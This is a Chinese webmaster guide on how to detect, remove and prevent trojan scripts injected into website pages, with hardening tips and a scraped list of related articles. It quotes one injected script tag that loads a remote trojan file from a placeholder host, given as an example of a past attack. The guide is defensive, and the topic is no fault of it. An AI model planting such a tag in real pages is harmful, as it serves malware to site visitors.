如何预防和检测网页挂马?
在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。
1:网页挂马的种类.
目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。更详细的资料,请点击查看挂马代码大全。
比尔云以前做过的‘极品源码下载站’就遇到过JS挂马
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
‘比尔云论坛’就遇到用户提权,利用动网程序漏洞(上传附件漏洞)拥有网站管理员权限。删了论坛几千条数据,一千多位会员的ID
2:如何检测网页是否被挂马。
(1):专业检测工具,六款免费网页安全检测工具横向测评
(2):google检测,或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。
(3):杀毒软件检测,常用的杀毒软件也可以检测出来。
(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。
(5):使用360网站安全监测。例:检测比尔云是否安全可点此查看。
3:如何清除网页木马。
一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。
如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)
4:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。
(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。
(2):保证你所使用的程序及时的更新。
(3):不要在前台网页上加注后台管理程序登陆页面的链接。
(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。
(5):管理员的用户名和密码要有一定复杂性,不能过于简单。
(6):IIS中禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。
(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。
(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。
如何预防和检测网页挂马?相关推荐
- 如何预防和检测网页挂马(转)
转自:http://lusongsong.com/reed/79.html 1:网页挂马的种类. 目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.更详细的资料,请点击 ...
- Web安全-检测-网页挂马
网马 网马的本质是一个特定的网页,这个网页包含了攻击者精心构造的恶意代码,这些恶意代码通过利用浏览器(包括控件.插件)的漏洞,加载并执行攻击者指定的恶意软件(通常是木马). 网站挂马是黑客植入木马的一 ...
- 网络攻防之dns劫持与网页挂马(实测)
dns劫持与网页挂马 前提工作 --搭建CS(CobaltStrike) CobaltStrike简介 CobaltStrike是一款内网渗透测试神器,常被业界人称为CS. Cobalt Strike ...
- 学习记录03(网页挂马)
网页挂马 将木马程序上传到网站,使用木马生成器生成一个网马,放到网页空间,在添加代码使木马在网页打开时运行 1.常见的几种方式 将木马伪装成页面元素,木马被浏览器自动加载到本地 利用脚本运行的漏洞下载 ...
- 解析网页后门与网页挂马原理
网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的.Web服务器被攻克不算,还"城门失火殃及池鱼",网站的浏览者也不能幸免.这无论是对企业的信誉,还是对管理员的技术能力都是沉 ...
- 网页挂马防护市场探索
据调查表明百分之九十以上的病毒传播途径都是以网页***为主,其实网页***就是将***和网页结合在一起,打开网页的同时也会运行***.最初的网页***原理是利用IE 浏览器的ActiveX控件,运行网 ...
- Linux 网页挂马实验,网页挂马详细教程
网页挂马详细教程 网页挂马详细教程 其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了.. 下面我介绍5种方法 ...
- 网页挂码方式html css,CSS代码 解决网页挂马问题
CSS代码 解决网页挂马问题 发布时间:2009-10-01 02:13:24 作者:佚名 我要评论 两行CSS来解决网页挂马问题,共5种方案. 两行CSS来解决,共5种方案 一. ifram ...
- 瑞星4月2日安全综述:网页挂马攻击严重
4月2日安全综述: 据瑞星"云安全"系统统计,4月2日共有2,501,573人次的网民遭到网页挂马攻击,瑞星共截获了794,761个挂马网址,比昨日多出5万挂马网址. 当日被挂马网 ...
最新文章
- 1357篇ECCV 2020论文打包下载!奖项公布:李飞飞高徒获最佳论文奖
- 数据结构:堆(Heap)
- C++中的sta::atomic<bool>和auto类型
- python成长之路——第四天
- CSS3属性之多栏布局column
- db2 日期加减一天_常用SQL系列之(八):列值累计、占比、平均值以及日期运算等...
- Python 类常用各种方法及区别
- ios uiview 如何刷新_ios – 从另一个UIViewController刷新表
- 关注书籍和教程(更新中)
- Vue2.x源码学习笔记-Vue实例的属性和方法整理
- jQuery中的跨域问题
- linux操作指令训练,实验二linux 常用命令练习
- 服务端断开_Java多线程技术:实现多用户服务端Socket通信
- Quartz学习总结(1)——Spring集成Quartz框架
- 路由器长期通电好不好?
- MyBatis6:MyBatis集成Spring事物管理(下篇)
- linux - ab测试工具
- java 定时调用api_java定时任务接口ScheduledExecutorService
- 神州行省内流量套餐6元500M申请,发送BLSN6到10086即可
- pv ip uv区别